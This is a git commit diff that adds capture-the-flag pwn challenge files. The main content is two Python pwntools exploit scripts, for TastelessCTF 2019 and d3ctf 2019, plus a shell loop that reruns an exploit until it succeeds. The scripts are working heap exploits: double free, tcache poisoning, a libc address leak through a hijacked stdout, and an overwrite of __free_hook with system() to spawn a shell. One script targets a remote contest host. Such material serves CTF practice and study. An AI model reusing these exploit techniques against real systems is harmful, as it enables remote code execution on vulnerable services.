update

Ex-Origin · Dec 3, 2019 · 6f28225 · 6f28225
1 parent 9306d84
commit 6f28225
Show file tree

Hide file tree

Showing 25 changed files with 808 additions and 0 deletions.
diff --git a/TastelessCTF_2019/pwn/house_of_bad_taste/chall b/TastelessCTF_2019/pwn/house_of_bad_taste/chall
diff --git a/TastelessCTF_2019/pwn/house_of_bad_taste/chall.i64 b/TastelessCTF_2019/pwn/house_of_bad_taste/chall.i64
diff --git a/TastelessCTF_2019/pwn/house_of_bad_taste/exp.py b/TastelessCTF_2019/pwn/house_of_bad_taste/exp.py
@@ -0,0 +1,108 @@
+#!/usr/bin/python2
+# -*- coding:utf-8 -*-
+
+from pwn import *
+import os
+import struct
+import random
+import time
+import sys
+import signal
+
+salt = os.getenv('GDB_SALT') if (os.getenv('GDB_SALT')) else ''
+
+def clear(signum=None, stack=None):
+    print('Strip  all debugging information')
+    os.system('rm -f /tmp/gdb_symbols{}* /tmp/gdb_pid{}* /tmp/gdb_script{}*'.replace('{}', salt))
+    exit(0)
+
+# for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: 
+#     signal.signal(sig, clear)
+
+# # Create a symbol file for GDB debugging
+# try:
+#     gdb_symbols = '''
+
+#     '''
+
+#     f = open('/tmp/gdb_symbols{}.c'.replace('{}', salt), 'w')
+#     f.write(gdb_symbols)
+#     f.close()
+#     os.system('gcc -g -shared /tmp/gdb_symbols{}.c -o /tmp/gdb_symbols{}.so'.replace('{}', salt))
+#     # os.system('gcc -g -m32 -shared /tmp/gdb_symbols{}.c -o /tmp/gdb_symbols{}.so'.replace('{}', salt))
+# except Exception as e:
+#     print(e)
+
+context.arch = 'amd64'
+# context.arch = 'i386'
+context.log_level = 'debug'
+execve_file = './chall'
+# sh = process(execve_file, env={'LD_PRELOAD': '/tmp/gdb_symbols{}.so'.replace('{}', salt)})
+# sh = process(execve_file)
+sh = remote('hitme.tasteless.eu', 10601)
+# sh = remote('localhost', 1000)
+elf = ELF(execve_file)
+libc = ELF('./libc-2.29.so')
+# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+
+# Create temporary files for GDB debugging
+try:
+    gdbscript = '''
+    def pr
+        x/8gx $rebase(0x4060)
+        end
+    '''
+
+    f = open('/tmp/gdb_pid{}'.replace('{}', salt), 'w')
+    f.write(str(proc.pidof(sh)[0]))
+    f.close()
+
+    f = open('/tmp/gdb_script{}'.replace('{}', salt), 'w')
+    f.write(gdbscript)
+    f.close()
+except Exception as e:
+    pass
+
+def add(size, content):
+    sh.sendlineafter('> ', 'a')
+    sh.sendlineafter('size?', str(size))
+    sh.sendlineafter('format? ', 'z')
+    sh.sendafter(' note:\n', content)
+
+def edit(index, size, content):
+    sh.sendlineafter('> ', 'e')
+    sh.sendlineafter('id?', str(index))
+    sh.sendlineafter('size?', str(size))
+    sh.sendafter(' note:\n', content)
+
+def delete(index):
+    sh.sendlineafter('> ', 'd')
+    sh.sendlineafter('id?', str(index))
+
+def show(index):
+    sh.sendlineafter('> ', 's')
+    sh.sendlineafter('id?', str(index))
+
+add(0x17, '\n')
+add(0x98, '\n')
+add(0x98, '\n')
+delete(0)
+edit(0, 0x37, '\xff' * 0x30)
+delete(0)
+
+
+delete(1)
+add(0x98, '\n')
+show(0)
+
+sh.recvn(9)
+libc_addr = u64(sh.recvn(8)) - 0x1e4ca0
+log.success('libc_addr: ' + hex(libc_addr))
+
+add(0x200, p64(0) * 2 + p64(libc_addr + libc.symbols['__free_hook'] - 8))
+add(0x30, '/bin/sh\0' + p64(libc_addr + libc.symbols['system']))
+
+delete(3)
+
+sh.interactive()
+clear()
diff --git a/TastelessCTF_2019/pwn/house_of_bad_taste/libc-2.29.so b/TastelessCTF_2019/pwn/house_of_bad_taste/libc-2.29.so
diff --git a/d3ctf2019/pwn/new_heap/exp.py b/d3ctf2019/pwn/new_heap/exp.py
@@ -0,0 +1,127 @@
+#!/usr/bin/python2
+# -*- coding:utf-8 -*-
+
+from pwn import *
+import os
+import struct
+import random
+import time
+import sys
+import signal
+
+def clear(signum=None, stack=None):
+    print('Strip  all debugging information')
+    os.system('rm -f /tmp/gdb_symbols* /tmp/gdb_pid /tmp/gdb_script')
+    exit(0)
+
+for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: 
+    signal.signal(sig, clear)
+
+# # Create a symbol file for GDB debugging
+# try:
+#     gdb_symbols = '''
+
+#     '''
+
+#     f = open('/tmp/gdb_symbols.c', 'w')
+#     f.write(gdb_symbols)
+#     f.close()
+#     os.system('gcc -g -shared /tmp/gdb_symbols.c -o /tmp/gdb_symbols.so')
+#     # os.system('gcc -g -m32 -shared /tmp/gdb_symbols.c -o /tmp/gdb_symbols.so')
+# except Exception as e:
+#     pass
+
+context.arch = 'amd64'
+# context.arch = 'i386'
+# context.log_level = 'debug'
+execve_file = './new_heap'
+# execve_file = './new_heap'
+# sh = process(execve_file, env={'LD_PRELOAD': '/tmp/gdb_symbols.so'})
+# sh = process(execve_file)
+sh = remote('localhost', 1000)
+elf = ELF(execve_file)
+# libc = ELF('./libc-2.29.so')
+libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+
+# Create temporary files for GDB debugging
+try:
+    gdbscript = '''
+    def pr
+        x/18gx $rebase(0x202060)
+        end
+    b malloc
+    '''
+
+    f = open('/tmp/gdb_pid', 'w')
+    f.write(str(proc.pidof(sh)[0]))
+    f.close()
+
+    f = open('/tmp/gdb_script', 'w')
+    f.write(gdbscript)
+    f.close()
+except Exception as e:
+    pass
+
+def add(size, content):
+    sh.sendlineafter('3.exit\n', '1')
+    sh.sendlineafter('size:', str(size))
+    sh.sendafter('content:', content)
+
+def delete(index):
+    sh.sendlineafter('3.exit\n', '2')
+    sh.sendlineafter('index:', str(index))
+
+def local_exit(content):
+    sh.sendlineafter('3.exit\n', '3')
+    sh.sendafter('sure?\n', content)
+
+def clear_exit_buf(num):
+    for i in range(num):
+        local_exit('')
+
+
+sh.recvuntil('s:')
+high = (int(sh.recvline(), 16) - 2) * 0x100
+log.success('high: ' + hex(high))
+
+
+for i in range(9):
+    add(0x28, '\n')
+
+for i in range(9):
+    delete(i)
+
+add(0x28, '\n')
+
+local_exit('a' * 0x28 + p8(0x31) + '\0\0')
+# pause()
+delete(8) # hijack tcache
+clear_exit_buf(0x28 + 2)
+
+local_exit('a' * 0x28 + p64(0x31) + p16(high + 0x10))
+add(0x28, '\n')
+add(0x28, '\0' * 0x20 + '\xff' * 0x8)
+
+# hijack tcache
+delete(11)
+add(0x48, '\0' * 0x10)
+add(0x18, p16(0xe760)) # Let tcache point at stdout
+
+# pause()
+add(0x38, p64(0xfbad2887 | 0x1000) + p64(0) * 3 + p8(0xc8)) # hijack stdout
+result = sh.recvn(8)
+libc_addr = u64(result) - libc.symbols['_IO_2_1_stdin_']
+log.success('libc_addr: ' + hex(libc_addr))
+
+# again
+delete(8)
+clear_exit_buf(0x28 + 8 + 2 - 1)
+local_exit('a' * 0x28 + p64(0x31) + p64(libc_addr + libc.symbols['__free_hook']))
+
+add(0x28, '/bin/sh\0')
+add(0x28, p64(libc_addr + libc.symbols['system'])) # hijack __free_hook
+
+delete(15)
+
+sh.interactive()
+clear()
diff --git a/d3ctf2019/pwn/new_heap/exp.sh b/d3ctf2019/pwn/new_heap/exp.sh
@@ -0,0 +1,25 @@
+#!/bin/sh
+
+EXP_FILE=$1
+INTERPRETER="python2"
+STDERR_FILE="/tmp/exp.sh.err"
+
+times=0
+trap   " rm -f $STDERR_FILE ; exit "  INT
+
+if [ ! $1 ]
+then
+    echo "Usage: ./exp.sh ./your_file.py"
+    exit
+fi
+
+ulimit -c 0
+
+while ((!(test -e $STDERR_FILE) || (test -s $STDERR_FILE)))
+do
+    times=$((times+1))
+    printf "times %d\n\n" $times
+    $INTERPRETER $EXP_FILE 2>$STDERR_FILE
+done
+
+rm -f $STDERR_FILE
diff --git a/d3ctf2019/pwn/new_heap/libc.so.6 b/d3ctf2019/pwn/new_heap/libc.so.6
diff --git a/d3ctf2019/pwn/new_heap/new_heap b/d3ctf2019/pwn/new_heap/new_heap